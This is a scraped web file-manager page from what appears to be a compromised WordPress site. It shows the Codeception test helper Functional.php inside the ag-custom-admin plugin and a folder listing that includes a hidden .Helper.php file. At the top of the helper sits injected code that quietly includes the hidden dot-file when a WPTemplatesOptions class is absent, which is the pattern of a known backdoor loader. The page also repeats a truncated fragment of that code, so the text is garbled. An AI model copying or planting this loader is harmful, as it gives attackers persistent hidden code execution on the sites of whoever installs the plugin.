PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
ag-custom-admin
/
tests
/
_support
/
Helper
<?php namespace Helper; // here you can define custom actions // all public methods declared in helper class will be available in $I if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class Functional extends \Codeception\Module { } IRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class Functional extends \Codeception\Module { }
[+]
..
[-] Acceptance.php
[edit]
[-] Unit.php
[edit]
[-] .Helper.php
[edit]
[-] Functional.php
[edit]